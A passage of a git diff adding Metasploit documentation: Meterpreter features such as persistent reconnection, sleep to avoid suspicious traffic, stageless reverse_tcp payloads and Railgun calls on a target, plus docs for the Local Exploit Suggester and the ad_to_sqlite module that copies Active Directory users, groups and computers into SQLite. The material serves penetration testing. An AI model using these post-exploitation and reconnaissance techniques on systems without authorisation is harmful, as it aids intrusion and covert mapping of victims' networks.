+To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode).
+
+**Meterpreter Reliable Network Communication**
+
+Exiting Metasploit using ```exit -y``` no longer terminates the payload session like it used to. Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when an appropriate handler is available. If you wish to exit the session, make sure to ```sessions -K``` first.
+
+To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication).
+
+**Meterpreter Sleep Control**
+
+The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to avoid suspicious active communication. It also provides better efficiency.
+
+It is very simple to use. At the Meterpreter prompt, simply do:
+
+```
+meterpreter > sleep 20
+```
+
+And that will allow Meterpreter to sleep 20 seconds, and will reconnect.
+
+To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Sleep-Control).
+
+**Meterpreter Stageless Mode**
+
+A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to read more.
+
+To use the stageless payload, use ```windows/meterpreter_reverse_tcp``` instead.
+
+**Meterpreter Timeout Control**
+
+The timeout control basically defines the life span of Meterpreter. To configure it, use the
+```set_timeouts``` command:
+
+```
+meterpreter > set_timeouts
+Usage: set_timeouts [options]
+
+Set the current timeout options.
+Any or all of these can be set at once.
+
+OPTIONS:
+
+ -c Comms timeout (seconds)
+ -h Help menu
+ -t Retry total time (seconds)
+ -w Retry wait time (seconds)
+ -x Expiration timout (seconds)
+```
+
+To see the current timeout configuration, you can use the ```get_timeouts``` command:
+
+```
+meterpreter > get_timeouts
+Session Expiry : @ 2016-03-11 21:15:58
+Comm Timeout : 300 seconds
+Retry Total Time: 3600 seconds
+Retry Wait Time : 10 seconds
+```
+
+To learn more about timeout control, please [go here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control).
+
+**Meterpreter Transport Control**
+
+Transport Control allows you manage transports on the fly while the payload session is still running. Meterpreter can automatically cycle through the transports when communication fails, or you can do it manually.
+
+To learn more about this, please read this [documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control).
+
+## Using the Post Exploitation API in IRB
+
+To enter IRB, do the following at the Meterpreter prompt:
+
+```
+meterpreter > irb
+[*] Starting IRB shell
+[*] The 'client' variable holds the meterpreter client
+
+>>
+```
+
+**The client object**
+
+The client object in Meterpreter's IRB allows you control or retrieve information about the host. For example, this demonstrates how to obtain the current privilege we're running the payload as:
+
+```ruby
+>> client.sys.config.getuid
+```
+
+To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it:
+
+```
+>> client.inspect
+```
+
+You can use the #methods method to see what methods you can use:
+
+```
+>> client.methods
+```
+
+To find the source of the method, you can use the #source_location method. For example, say I want to find the source code for the #getuid method:
+
+```
+>> client.sys.config.method(:getuid).source_location
+=> ["/Users/user/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32]
+```
+
+The first element of the array is the location of the file. The second element is the line number of the method.
+
+**Using Railgun**
+
+Railgun allows you to use the remote machine's Windows API in Ruby. For example, to create a MessageBox on the target machine, do:
+
+```
+>> client.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
+=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
+```
+
+To learn more about using Railgun, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation).
+
diff --git a/documentation/modules/post/multi/recon/local_exploit_suggester.md b/documentation/modules/post/multi/recon/local_exploit_suggester.md
new file mode 100644
index 0000000000..89d54765bb
--- /dev/null
+++ b/documentation/modules/post/multi/recon/local_exploit_suggester.md
@@ -0,0 +1,31 @@
+The Local Exploit Suggester is a post-exploitation module that you can use to check a system for local vulnerabilities. It performs local exploit checks; it does not actually run any exploits, which is useful because this means you to scan a system without being intrusive. In addition to being stealthy, it's a time saver. You don't have to manually search for local exploits that will work; it'll show you which exploits the target is vulnerable to based on the system's platform and architecture.
+
+The Local Exploit Suggester is available for Python, PHP, and Windows Meterpreter.
+
+
+## Vulnerable Application
+
+To use the Local Exploit Suggester:
+
+* You must have an open Meterpreter session.
+
+## Verification Steps
+
+Please see the Overview section.
+
+##Options
+
+You can set the following options for the Local Exploit Suggester:
+
+* **showdescription** - Set this option to true to see more details about each exploit.
+
+
+## Scenarios
+
+When the Local Exploit Suggester runs, it displays a list of local exploits that the target may be vulnerable to, and it tells you the likelihood of exploitation.
+
+The following terms are used to help you understand how vulnerable a target is to a particular exploit:
+
+* **Vulnerable** - Indicates that the target is vulnerable.
+* **Appears** - Indicates that the target may be vulnerable based on the file version, but the vulnerable code has not been tested.
+* **Detected** - Indicates that the target has the file, but it cannot be determined whether or not the target is vulnerable.
\ No newline at end of file
diff --git a/documentation/modules/post/windows/gather/ad_to_sqlite.md b/documentation/modules/post/windows/gather/ad_to_sqlite.md
new file mode 100644
index 0000000000..e6c0321023
--- /dev/null
+++ b/documentation/modules/post/windows/gather/ad_to_sqlite.md
@@ -0,0 +1,521 @@
+This is a post exploitation module which has the effect of copying the AD groups, user membership
+(taking into account nested groups), user information and computers to a local SQLite database.
+This is particularly useful for red teaming and simulated attack engagements because it offers
+the ability to gain situational awareness of the target's domain completely offline. Examples of
+queries that can be run locally include:
+
+* Identification of members in a particular group (e.g. 'Domain Admins'), taking into account
+ members of nested groups.
+* Organizational hierarchy information (if the manager LDAP attribute is used).
+* Ability to determine group membership and user membership (e.g. 'What groups are these users a
+ member of?', 'What users are members of these groups?', 'List all members who are effectively
+ members of the Domain Admins group who are not disabled' etc)
+* Expansion of the userAccountControl and sAMAccountType variables for querying ease.
+* Generation of a list of DNS hostnames, computer names, operating system versions etc of each
+ domain joined computer.
+* Identification of security groups that have managers.
+* Exporting anything above in different formats, including those which can be imported into
+ other tools.
+
+## Mechanism
+
+This module makes heavy usage of ADSI and performs the following basic steps:
+
+**User and group acquisition**
+
+* Perform an ADSI query to list all active directory groups and store them in the local ad_groups
+ table (parsing attributes which contain flags).
+* Loop through them and, for each group, launch another LDAP query to list the effective members of
+ the group (using the LDAP_MATCHING_RULE_IN_CHAIN OID). The effect is that it will reveal all
+ effective members of that group, even if they are not direct members of the group.
+* For each user, perform another query to obtain user specific attributes and insert them into the
+ local ad_users table.
+* Insert a new row into the ad_mapping table associating the user RID with the group RID.
+
+**Computer acquisition**
+
+* Perform an ADSI query to list all computers in the domain.
+* Parse any attributes containing flags (userAccountControl, sAMAccountType) and insert them into
+ the local ad_computers table.
+
+## Module Specific Options
+
+Option | Purpose
+--------------- | --------
+GROUP_FILTER | Additional LDAP filters to apply when building the initial list of groups.
+SHOW_COMPUTERS | If set to TRUE, this will write a line-by-line list of computers, in the format: ```Computer [Name][DNS][RID]``` to the console. For example: ```Computer [W2K8DC][W2K8DC.goat.stu][1000]```
+SHOW_USERGROUPS | If set to TRUE, this will write a line-by-line list of user to group memberships, in the format: ```Group [Group Name][Group RID] has member [Username][User RID]```. For example: ```Group [Domain Users][513] has member [it.director][1132]```. This can be used mainly for progress, but it may be simpler to cat and grep for basic queries. However, the real power of this module comes from the ability to rapidly perform queries against the SQLite database.
+
+## SQLite Database
+
+**Construction**
+
+The following tables will be present in the local SQLite database. The ad_* tables use the RID of
+the user, computer or group as the primary key, and the view_mapping table effectively joins the
+ad_mapping table with ad_users.* and ad_groups.* by RID.
+
+Note that the purpose of the less obvious flags is documented in the source code, along with
+references to MSDN and Technet where appropriate, so this can be easily looked up during an
+engagement without needing to refer to this page.
+
+Table Name | Purpose
+------------ | --------
+ad_computers | Information on each of the domain joined computers.
+ad_users | Information on each of the domain users.
+ad_groups | Information on each of the active directory groups.
+ad_mapping | Links the users table to the groups table (i.e. can be used to show which users are effectively members of which groups).
+view_mapping | Joins the ad_mapping table to the ad_users and ad_groups table, provided for convenience. This will be the table that most queries will be run against.
+
+Within each table, the naming convention for the columns is to prefix anything in the
+ad_computers table with c_, anything in the ad_users table with u_ and anything in the
+ad_groups table with g_. This convention makes the joins between tables much more intuitive.
+
+**ad_computers**
+
+The table below shows the columns in the ad_computers table. The fields in capitals at the end
+(c_ADS_* and c_SAM_*) are expanded from the userAccountControl and sAMAccountType attributes to
+provide an easy way to perform the queries against individual flags.
+
+Column Name | Type | Purpose
+------------------------------------------------ | ------- | --------
+c_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits).
+c_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx).
+c_cn | TEXT | The name that represents an object. Used to perform searches.
+c_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency.
+c_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system.
+c_dNSHostName | TEXT | The name of computer, as registered in DNS.
+c_displayName | TEXT | The display name for an object. This is usually the combination of the users first name, middle initial, and last name.
+c_logonCount | INTEGER | The number of times the account has successfully logged on. A value of 0 indicates that the value is unknown.
+c_userAccountControl | INTEGER | Flags that control the behavior of the user account. See [Use-Account-Control attribute](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832%28v=vs.85%29.aspx) for a description, but they are also parsed and stored in the c_ADS_UF_* columns below.
+c_primaryGroupID | INTEGER | Contains the relative identifier (RID) for the primary group of the user. By default, this is the RID for the Domain Users group.
+c_badPwdCount | INTEGER | The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.
+c_description | TEXT | Contains the description to display for an object.
+c_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here.
+c_operatingSystem | TEXT | The Operating System name, for example, Windows Vista Enterprise.
+c_operatingSystemServicePack | TEXT | The operating system service pack ID string (for example, SP3).
+c_operatingSystemVersion | TEXT | The operating system version string, for example, 4.0.
+c_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog.
+c_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog.
+c_ADS_UF_SCRIPT | INTEGER | If 1, the logon script is executed.
+c_ADS_UF_ACCOUNTDISABLE | INTEGER | If 1, the user account is disabled.
+c_ADS_UF_HOMEDIR_REQUIRED | INTEGER | If 1, the home directory is required.
+c_ADS_UF_LOCKOUT | INTEGER | If 1, the account is currently locked out.
+c_ADS_UF_PASSWD_NOTREQD | INTEGER | If 1, no password is required.
+c_ADS_UF_PASSWD_CANT_CHANGE | INTEGER | If 1, the user cannot change the password.
+c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | INTEGER | If 1, the user can send an encrypted password.
+c_ADS_UF_TEMP_DUPLICATE_ACCOUNT | INTEGER | If 1, this is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. Also known as a local user account.
+c_ADS_UF_NORMAL_ACCOUNT | INTEGER | If 1, this is a default account type that represents a typical user.
+c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT | INTEGER | If 1, this is a permit to trust account for a system domain that trusts other domains.
+c_ADS_UF_WORKSTATION_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a computer that is a member of this domain.
+c_ADS_UF_SERVER_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a system backup domain controller that is a member of this domain.
+c_ADS_UF_DONT_EXPIRE_PASSWD | INTEGER | If 1, the password for this account will never expire.
+c_ADS_UF_MNS_LOGON_ACCOUNT | INTEGER | If 1, this is an MNS logon account.
+c_ADS_UF_SMARTCARD_REQUIRED | INTEGER | If 1, the user must log on using a smart card.
+c_ADS_UF_TRUSTED_FOR_DELEGATION | INTEGER | If 1, the service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service.
+c_ADS_UF_NOT_DELEGATED | INTEGER | If 1, the security context of the user will not be delegated to a service even if the service account is set as trusted for Kerberos delegation.
+c_ADS_UF_USE_DES_KEY_ONLY | INTEGER | If 1, restrict this principal to use only Data Encryption Standard (DES) encryption types for keys.
+c_ADS_UF_DONT_REQUIRE_PREAUTH | INTEGER | If 1, this account does not require Kerberos pre-authentication for logon.
+c_ADS_UF_PASSWORD_EXPIRED | INTEGER | If 1, the user password has expired. This flag is created by the system using data from the Pwd-Last-Set attribute and the domain policy.
+c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION | INTEGER | If 1, the account is enabled for delegation. This is a security-sensitive setting; accounts with this option enabled should be strictly controlled. This setting enables a service running under the account to assume a client identity and authenticate as that user to other remote servers on the network.
+c_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx) attribute. If 1, this flag is set.
+c_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+c_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+
+**ad_users**
+
+The table below shows the columns in the ad_computers table. The fields in capitals at the end
+(c_ADS_* and c_SAM_*) are expanded from the userAccountControl and sAMAccountType attributes to
+provide an easy way to perform the queries against individual flags.
+
+Column Name | Type | Purpose
+------------------------------------------------| ------- | -------
+u_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits).
+u_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +u_cn | TEXT | The name that represents an object. Used to perform searches. +u_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +u_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +u_dNSHostName | TEXT | The name of computer, as registered in DNS. +u_displayName | TEXT | The display name for an object. This is usually the combination of the users first name, middle initial, and last name. +u_logonCount | INTEGER | The number of times the account has successfully logged on. A value of 0 indicates that the value is unknown. +u_userPrincipalName | TEXT | Technically, this is an Internet-style login name for a user based on the Internet standard RFC 822. By convention and in practice, it is the user's e-mail address. +u_displayName | TEXT | N/A +u_adminCount | INTEGER | Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). +u_userAccountControl | INTEGER | Flags that control the behavior of the user account. See [User-Account-Control](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832%28v=vs.85%29.aspx) for a description, but they are also parsed and stored in the c_ADS_UF_* columns below. +u_primaryGroupID | INTEGER | Contains the relative identifier (RID) for the primary group of the user. By default, this is the RID for the Domain Users group. +u_badPwdCount | INTEGER | The number of times the user tried to log on to the account using an incorrect password. 
A value of 0 indicates that the value is unknown. +u_description | TEXT | Contains the description to display for an object. +u_title | TEXT | Contains the user's job title. This property is commonly used to indicate the formal job title, such as Senior Programmer, rather than occupational class. +u_manager | TEXT | The distinguished name of this user's manager. +u_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +u_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +u_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +u_ADS_UF_SCRIPT | INTEGER | If 1, the logon script is executed. +u_ADS_UF_ACCOUNTDISABLE | INTEGER | If 1, the user account is disabled. +u_ADS_UF_HOMEDIR_REQUIRED | INTEGER | If 1, the home directory is required. +u_ADS_UF_LOCKOUT | INTEGER | If 1, the account is currently locked out. +u_ADS_UF_PASSWD_NOTREQD | INTEGER | If 1, no password is required. +u_ADS_UF_PASSWD_CANT_CHANGE | INTEGER | If 1, the user cannot change the password. +u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | INTEGER | If 1, the user can send an encrypted password. +u_ADS_UF_TEMP_DUPLICATE_ACCOUNT | INTEGER | If 1, this is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. Also known as a local user account. +u_ADS_UF_NORMAL_ACCOUNT | INTEGER | If 1, this is a default account type that represents a typical user. +u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT | INTEGER | If 1, this is a permit to trust account for a system domain that trusts other domains. +u_ADS_UF_WORKSTATION_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a computer that is a member of this domain. 
+u_ADS_UF_SERVER_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a system backup domain controller that is a member of this domain.
+u_ADS_UF_DONT_EXPIRE_PASSWD | INTEGER | If 1, the password for this account will never expire.
+u_ADS_UF_MNS_LOGON_ACCOUNT | INTEGER | If 1, this is an MNS logon account.
+u_ADS_UF_SMARTCARD_REQUIRED | INTEGER | If 1, the user must log on using a smart card.
+u_ADS_UF_TRUSTED_FOR_DELEGATION | INTEGER | If 1, the service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service.
+u_ADS_UF_NOT_DELEGATED | INTEGER | If 1, the security context of the user will not be delegated to a service even if the service account is set as trusted for Kerberos delegation.
+u_ADS_UF_USE_DES_KEY_ONLY | INTEGER | If 1, restrict this principal to use only Data Encryption Standard (DES) encryption types for keys.
+u_ADS_UF_DONT_REQUIRE_PREAUTH | INTEGER | If 1, this account does not require Kerberos pre-authentication for logon.
+u_ADS_UF_PASSWORD_EXPIRED | INTEGER | If 1, the user password has expired. This flag is created by the system using data from the Pwd-Last-Set attribute and the domain policy.
+u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION | INTEGER | If 1, the account is enabled for delegation. This is a security-sensitive setting; accounts with this option enabled should be strictly controlled. This setting enables a service running under the account to assume a client identity and authenticate as that user to other remote servers on the network.
+u_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx). If 1, this flag is set.
+u_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+u_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+u_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_groups** + +The table below shows the columns in the ad_groups table. + +Column Name | Type | Purpose +--------------------------------| ------- | ------- +g_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +g_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +g_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +g_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +g_adminCount | INTEGER | Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). +g_description | TEXT | Contains the description to display for an object. +g_comment | TEXT | The user's comment. This string can be a null string. 
Sometimes passwords or sensitive information can be stored here. +g_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +g_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +g_managedby | TEXT | The manager of this group. +g_cn | TEXT | The common name of the group. +g_groupType | INTEGER | Contains a set of flags that define the type and scope of a group object. These are expanded in the g_GT_* fields below. +g_GT_GROUP_CREATED_BY_SYSTEM | INTEGER | If 1, this is a group that is created by the system. +g_GT_GROUP_SCOPE_GLOBAL | INTEGER | If 1, this is a group with global scope. +g_GT_GROUP_SCOPE_LOCAL | INTEGER | If 1, this is a group with domain local scope. +g_GT_GROUP_SCOPE_UNIVERSAL | INTEGER | If 1, this is a group with universal scope. +g_GT_GROUP_SAM_APP_BASIC | INTEGER | If 1, this specifies an APP_BASIC group for Windows Server Authorisation Manager. +g_GT_GROUP_SAM_APP_QUERY | INTEGER | If 1, this specifies an APP_QUERY group for Windows Server Authorisation Manager. +g_GT_GROUP_SECURITY | INTEGER | If 1, this specifies a security group. +g_GT_GROUP_DISTRIBUTION | INTEGER | If 1, this specifies a distribution group (this is the inverse of g_GT_GROUP_SECURITY). I have included it so that distribution groups can be identified more easily (query readability). +g_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx). If 1, this flag is set. +g_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). 
+g_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+g_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+g_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+g_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+g_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+g_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+g_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute).
+
+**ad_mapping**
+
+The table below shows the columns in the ad_mapping table. This is used to link users to groups.
+
+Column Name | Type | Purpose
+------------| ------- | -------
+user_rid | INTEGER | The RID of a user
+group_rid | INTEGER | The RID of a group
+
+For example, if a particular record had a user_rid of 1000 and a group_rid of 1001, this would
+imply that the user whose RID is 1000 is a member of the group whose RID is 1001. Use the
+view_mapping view in order to do any meaningful queries, but its content is derived from this one.
+
+**view_mapping**
+
+This table is a combination of ad_groups.* and ad_users.*. Therefore, the fields are the
+combination of the u_* and the g_* fields shown above.
+
+## Database Structure
+
+There are a few design choices that I have deliberately made which I have given an explanation for
+below. This is because the reasons for them may not be obvious.
+
+The users, groups and computers are based on the same class, so the "proper" way to do this would
+be to place them all into one table and then restrict results based on sAMAccountType to determine
+what type of object it is. In addition, the userAccountControl and sAMAccountType and groupType
+attributes have been split out into individual columns which is, from a technical point of view,
+unnecessary duplication.
+
+The reason for this is ease of use; we are much more intuitively familiar with users, groups and
+computers being different objects (even if they are all really the same thing), and it is much
+easier to understand and formulate a query such as:
+
+```
+SELECT u_sAMAccountName from ad_users where u_ADS_UF_LOCKOUT = 0 and u_SAM_NORMAL_USER_ACCOUNT = 1
+```
+
+than:
+
+```
+SELECT u_sAMAccountName from ad_users where ((u_userAccountControl&0x00000010) = 0) and ((u_sAMAccountType&0x30000000) > 0)
+```
+
+This is also true of the sAMAccountType value; this is a code which has a 1:1 mapping with MSDN
+constants (i.e. they are not flags) and it would be more efficient to implement a simple lookup table.
+However, for consistency, I have implemented the columns for the possible values in the same way as
+the attributes which comprise multiple values in the form of flags.
+
+This database is designed for quick-and-dirty queries, not to be an efficient AD database, and the
+benefits of the ease of access significantly outweighs the slight performance impact.
+
+## Conversion to Unicode
+
+All of the strings injected into the database have been converted to UTF-8 (encode('UTF-8')) which,
+at first glance, does not seem necessary. The reason is documented [here](https://github.com/rails/rails/issues/1965);
+namely that SQLite stores Unicode strings as 'text' but non-converted strings as 'blobs' regardless
+of the type affinity. Omitting the unicode conversion meant that most of the text queries did not
+work properly because the database was treating the text fields as raw binary data.
+
+## Multi valued attributes
+
+With the exception of the memberOf attribute, it is assumed that other attributes are single
+valued, which may result in a small about of information being missed. For example, the
+description attribute can (in some circumstances) be multi-valued but the ADSI queries will only
+return the first value.
+ +This will not make any practical difference for the vast majority of enterprise domains. + +## Database Queries + +Sqlite3 supports a number of output formats (use .mode for all options). These can be used to +easily present the searched data. + +For example, line mode is useful to see all fields in an easy to view form. The example query +searches for all information about the user whose username is 'unprivileged.user' + +``` +sqlite> .mode line +sqlite> select * from ad_users where u_sAMAccountName = "unprivileged.user"; + u_rid = 1127 + u_distinguishedName = CN=Unprivileged User,CN=Users,DC=goat,DC=stu + u_description = Do not delete. Default pass set to password123 + u_displayName = Unprivileged User + u_sAMAccountType = 805306368 + u_sAMAccountName = unprivileged.user + u_logonCount = 1 + u_userAccountControl = 512 + u_primaryGroupID = 513 + u_cn = Unprivileged User + u_adminCount = 1 + u_badPwdCount = 0 + u_userPrincipalName = unprivileged.user@goat.stu + u_comment = + u_title = + u_manager = CN=Stuart Morgan - User,CN=Users,DC=goat,DC=stu + u_whenCreated = 2015-12-20 20:10:54.000 + u_whenChanged = 2015-12-20 23:12:48.000 + u_ADS_UF_SCRIPT = 0 + u_ADS_UF_ACCOUNTDISABLE = 0 + u_ADS_UF_HOMEDIR_REQUIRED = 0 + u_ADS_UF_LOCKOUT = 0 + u_ADS_UF_PASSWD_NOTREQD = 0 + u_ADS_UF_PASSWD_CANT_CHANGE = 0 + u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0 + u_ADS_UF_TEMP_DUPLICATE_ACCOUNT = 0 + u_ADS_UF_NORMAL_ACCOUNT = 1 + u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT = 0 + u_ADS_UF_WORKSTATION_TRUST_ACCOUNT = 0 + u_ADS_UF_SERVER_TRUST_ACCOUNT = 0 + u_ADS_UF_DONT_EXPIRE_PASSWD = 0 + u_ADS_UF_MNS_LOGON_ACCOUNT = 0 + u_ADS_UF_SMARTCARD_REQUIRED = 0 + u_ADS_UF_TRUSTED_FOR_DELEGATION = 0 + u_ADS_UF_NOT_DELEGATED = 0 + u_ADS_UF_USE_DES_KEY_ONLY = 0 + u_ADS_UF_DONT_REQUIRE_PREAUTH = 0 + u_ADS_UF_PASSWORD_EXPIRED = 0 +u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0 + u_SAM_DOMAIN_OBJECT = 0 + u_SAM_GROUP_OBJECT = 0 + u_SAM_NON_SECURITY_GROUP_OBJECT = 0 + u_SAM_ALIAS_OBJECT = 0 + 
u_SAM_NON_SECURITY_ALIAS_OBJECT = 0 + u_SAM_NORMAL_USER_ACCOUNT = 1 + u_SAM_MACHINE_ACCOUNT = 0 + u_SAM_TRUST_ACCOUNT = 0 + u_SAM_APP_BASIC_GROUP = 0 + u_SAM_APP_QUERY_GROUP = 0 + u_SAM_ACCOUNT_TYPE_MAX = 0 +``` + +SQLite can generate output in HTML format with headers. For example, the query below displays the +username, email address and number of times that the user has logged on for all users who have a +manager with the word 'Stuart' somewhere in the DN. + +``` +sqlite> .mode html +sqlite> .headers on +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +u_sAMAccountName +u_userPrincipalName +u_logonCount + +unprivileged.user +unprivileged.user@goat.stu +1 + +sqlite> +``` + +The same query can be used in INSERT mode, in which the results will be displayed as a series of +SQL insert statements for importing into another database: + +``` +sqlite> .mode insert +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +INSERT INTO table(u_sAMAccountName,u_userPrincipalName,u_logonCount) VALUES('unprivileged.user','unprivileged.user@goat.stu',1); +``` + +The default mode (list) will display the results with a pipe character separating the fields: + +``` +sqlite> .mode list +sqlite> select u_sAMAccountName,u_userPrincipalName,u_logonCount from ad_users where u_manager LIKE '%Stuart%'; +u_sAMAccountName u_userPrincipalName u_logonCount +unprivileged.user unprivileged.user@goat.stu 1 +``` + +There are a number of other ways that this information could be presented; please play with SQLite +in order to learn how to use them. + +## Example Queries + +A number of example queries are shown below, in order to give an idea of how easy it is to build up +complex queries. 
